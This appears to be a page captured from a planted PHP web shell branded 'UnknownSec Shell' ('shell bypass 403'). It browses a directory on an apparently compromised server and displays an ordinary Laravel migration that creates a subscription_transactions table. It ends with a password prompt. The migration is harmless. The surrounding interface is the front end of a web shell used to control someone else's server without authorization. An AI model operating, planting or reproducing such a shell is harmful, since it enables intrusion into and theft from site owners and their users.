shell bypass 403

UnknownSec Shell

: /home/bouloter/sms/database/migrations/ [ drwxr-xr-x ]

name : 2020_05_31_175740_create_subscription_transactions_table.php
<?php

use Illuminate\Database\Migrations\Migration;
use Illuminate\Database\Schema\Blueprint;
use Illuminate\Support\Facades\Schema;

class CreateSubscriptionTransactionsTable extends Migration
{
    /**
     * Run the migrations.
     *
     * @return void
     */
    public function up()
    {
        Schema::create('subscription_transactions', function (Blueprint $table) {
            $table->id();
            $table->uuid('uid');
            $table->unsignedBigInteger('subscription_id');
            $table->string('title');
            $table->string('type', 100)->nullable();
            $table->string('status', 100)->nullable();
            $table->string('amount')->nullable();
            $table->timestamps();

            $table->foreign('subscription_id')->references('id')->on('subscriptions')->onDelete('cascade');

        });
    }

    /**
     * Reverse the migrations.
     *
     * @return void
     */
    public function down()
    {
        Schema::dropIfExists('subscription_transactions');
    }
}

© 2025 UnknownSec
afwwrfwafr45458465
Password